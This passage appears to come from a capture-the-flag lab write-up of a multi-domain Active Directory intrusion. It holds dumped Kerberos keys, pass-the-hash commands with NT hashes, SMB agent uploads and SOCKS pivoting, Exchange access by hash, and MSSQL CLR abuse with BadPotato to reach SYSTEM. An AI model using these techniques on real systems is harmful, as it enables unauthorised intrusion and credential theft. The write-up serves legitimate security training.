pen.me\HealthMailbox7e80c8e:aes256-cts-hmac-sha1-96:02fce72c7f20c3bb2134937dcb5deb01ed88ef459324e3b8e7da4d5e4494d282
pen.me\HealthMailbox7e80c8e:aes128-cts-hmac-sha1-96:1ff9878c362d232a7f90ffaacc860a8f
pen.me\HealthMailbox7e80c8e:des-cbc-md5:9b8940328f43a41a
pen.me\HealthMailboxeda7e80:aes256-cts-hmac-sha1-96:09761bcc5edd87bf26850b559705959383bc36afad0d39a8b3d0ab5afa068938
pen.me\HealthMailboxeda7e80:aes128-cts-hmac-sha1-96:8ec3fd930227af6aa5d42d0579ce59de
pen.me\HealthMailboxeda7e80:des-cbc-md5:8f670ef294cd80a2
pen.me\HealthMailbox285895e:aes256-cts-hmac-sha1-96:ca046e53700796fb14d1e6ac6be9b731749db13155ebaa9fc8bf849ec2a741a6
pen.me\HealthMailbox285895e:aes128-cts-hmac-sha1-96:e21f515b3a570a2d7a34fc07a395d5eb
pen.me\HealthMailbox285895e:des-cbc-md5:57c801673ed0bfd9
pen.me\HealthMailbox51cfeb1:aes256-cts-hmac-sha1-96:44b6bbb662ae92da5efc1c89374b36715ff30ec7573c02b008754661d3a2d0f8
pen.me\HealthMailbox51cfeb1:aes128-cts-hmac-sha1-96:b95a8c3c49a94ff83da78e2b45592f97
pen.me\HealthMailbox51cfeb1:des-cbc-md5:e367548ca2e6e58c
pen.me\HealthMailboxc4b8425:aes256-cts-hmac-sha1-96:bc5465a163df0842aa0626b16144a8e518cbebfa2dc2a3154d26c41c8e4ac53c
pen.me\HealthMailboxc4b8425:aes128-cts-hmac-sha1-96:4108c2df675446b290742916b3b9ec32
pen.me\HealthMailboxc4b8425:des-cbc-md5:61b031f194f2c1dc
pen.me\HealthMailbox528d2e1:aes256-cts-hmac-sha1-96:3726249220638dccab3ea5c39bd5bd2f41cb21a24e3679d5f72f64a4f4ac81a5
pen.me\HealthMailbox528d2e1:aes128-cts-hmac-sha1-96:5e79c4d2f9ec7d72aca8cbe84f73d0f9
pen.me\HealthMailbox528d2e1:des-cbc-md5:8370d352f2169b4f
pen.me\HealthMailboxc5e00fd:aes256-cts-hmac-sha1-96:bd7b3c2a7d0379ed713252195380ee07612cb1727ff2eb1921898ba265e5a7cc
pen.me\HealthMailboxc5e00fd:aes128-cts-hmac-sha1-96:d3b39c0815d4b99e6c9bdcf384214d10
pen.me\HealthMailboxc5e00fd:des-cbc-md5:3eaedaea9b4cdfc1
pen.me\HealthMailboxee2d866:aes256-cts-hmac-sha1-96:f8102e19d48a7c029c6c95ffe70e801386c9e2719dee3c935c3c27d78ba1b4c6
pen.me\HealthMailboxee2d866:aes128-cts-hmac-sha1-96:ffe40245591c77b6421734360c4ff665
pen.me\HealthMailboxee2d866:des-cbc-md5:022649d6c2d979ab
pen.me\HealthMailbox190d1f5:aes256-cts-hmac-sha1-96:ad9e44a57f30926c0f68a38151b2bcf09d54945d09867a7a1824a475a90712f4
pen.me\HealthMailbox190d1f5:aes128-cts-hmac-sha1-96:06988d81ef1af625370abee3885d9e71
pen.me\HealthMailbox190d1f5:des-cbc-md5:1394a81661fddf04
pen.me\HealthMailbox45dde9b:aes256-cts-hmac-sha1-96:7428e94c5b087cb520e2d653c79c3a06f0d4f3d041a5f6a3678f145df40ed692
pen.me\HealthMailbox45dde9b:aes128-cts-hmac-sha1-96:f5be9c837cedac4b1b856e4c3da44bff
pen.me\HealthMailbox45dde9b:des-cbc-md5:adabeca7e6a71a8c
pen.me\HealthMailboxbb65e08:aes256-cts-hmac-sha1-96:6db909d2c5457125a4cd0720408cc6057919c89f20afedd18dcacbeb72ab9f98
pen.me\HealthMailboxbb65e08:aes128-cts-hmac-sha1-96:13ae7b3b85d8374cb7ecf705ea5609c6
pen.me\HealthMailboxbb65e08:des-cbc-md5:8fa7fbe9645df11c
pen.me\userd:aes256-cts-hmac-sha1-96:516fcce3511871af4239e3cfd61f23fbb3ae2cbe2d3417b080f2cdd72d03ce3d
pen.me\userd:aes128-cts-hmac-sha1-96:fc0ffc27c1ab4185739f9e18dbfd6383
pen.me\userd:des-cbc-md5:a45726a79ba8bc2f
pen.me\exchange:aes256-cts-hmac-sha1-96:f265e64d7428db55e4d423ec80776c2bc05476696db7a730b223e8e768b8ee25
pen.me\exchange:aes128-cts-hmac-sha1-96:9d27741e522e2050487c1a224ab56b53
pen.me\exchange:des-cbc-md5:51f4d9a820f46129
DCADMIN$:aes256-cts-hmac-sha1-96:831fe5130f7b81bf8c62386306681d528408d74567152c4c59b7ee0fbabbedb2
DCADMIN$:aes128-cts-hmac-sha1-96:ff88abc8419a4f1f644dba1b5af4c318
DCADMIN$:des-cbc-md5:ae32322c6d16e35b
IZ1TUCEKFDPCEMZ$:aes256-cts-hmac-sha1-96:f154935b911891bbc2020fbbff9cc57b585eac7195890806163e7ca15765c386
IZ1TUCEKFDPCEMZ$:aes128-cts-hmac-sha1-96:339faf0f866e55c4a955585ac85b2e07
IZ1TUCEKFDPCEMZ$:des-cbc-md5:26791a73ba3b7549
IZ88QYK8Y8Y3VXZ$:aes256-cts-hmac-sha1-96:01454db4b94a26ba1432e94fd122ab244ac0de3a5aa1eeeadd561a9ae081e177
IZ88QYK8Y8Y3VXZ$:aes128-cts-hmac-sha1-96:cc441303c088a6064c13dc873a45d286
IZ88QYK8Y8Y3VXZ$:des-cbc-md5:abc1adc81c7334a7
PENTEST$:aes256-cts-hmac-sha1-96:189ddfd33fa311848e6eb246a4561b090d938527cff727f2305f3d9a82aaf480
PENTEST$:aes128-cts-hmac-sha1-96:0d474a6afb33441d51df2bbb5e29c35a
PENTEST$:des-cbc-md5:0b29cd1a4f454f52

This feels completely unintended: I never needed a SID at all. Crossing into a second domain would normally mean forging a ticket that carries the target domain's privileged SIDs (SID History / ExtraSids); here the pentest.me Administrator hash was simply accepted on the pen.me DC, and the dump hands over the pen.me Administrator hash for everything that follows.

wmiexec.py pen.me/Administrator@172.24.7.5 -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk

flag09

172.24.7.5 is dual-homed, with a second NIC on the 172.25.12.x segment.

Upload the proxy agent over SMB with smbclient:

smbclient.py pen.me/Administrator@172.24.7.5 -hashes :0f91138ef5392b87416ed41cb6e810b7
use c$
put xxxxx

Then stowaway would not bring the socks proxy up for some reason.

Restarting it fixed that.

wmiexec.py pen.me/administrator@172.25.12.19 -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk

flag10

GitHub - Jumbo-WJB/PTH_Exchange: If you only have hash, you can still operate exchange

python .\pthexchange.py --target https://172.25.12.19/ --username exchange --password '00000000000000000000000000000000:21a43bd74a20a330ef77a4e7bd179d8c' --action Download

The --password value is LM:NT with the LM half zeroed out; the NT hash is the one secretsdump returned for pen.me\exchange. Log into OWA as the exchange user.

flag{Exchange_have_so_many_things}

flag11

Continue laterally to 172.25.12.29:

wmiexec.py pen.me/administrator@172.25.12.29 -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk

flag12

172.24.7.43 is also dual-homed and leads on to 172.26.8.x; pass-the-hash there with the pentest.me DC Administrator hash and drop the proxy agent:

smbclient.py pentest.me/Administrator@172.24.7.43 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1
use c$
cd Users\Administrator\Desktop
put xxx.exe

GitHub - Ridter/PySQLTools: Mssql 利用工具

python PySQLTools.py sa:'sqlserver_2022'@172.26.8.16 -debug

All in one go:

enable_ole
enable_clr

install_clr
clr_badpotato whoami

clr_badpotato type C:\Users\Administrator\Desktop\flag.txt

enable_ole and enable_clr flip server-wide sp_configure options (Ole Automation Procedures, clr enabled), a persistent change worth reverting when done. clr_badpotato loads a CLR assembly and uses the SQL service account's SeImpersonatePrivilege to run the command as SYSTEM, which is why the flag under the Administrator desktop becomes readable from a database session.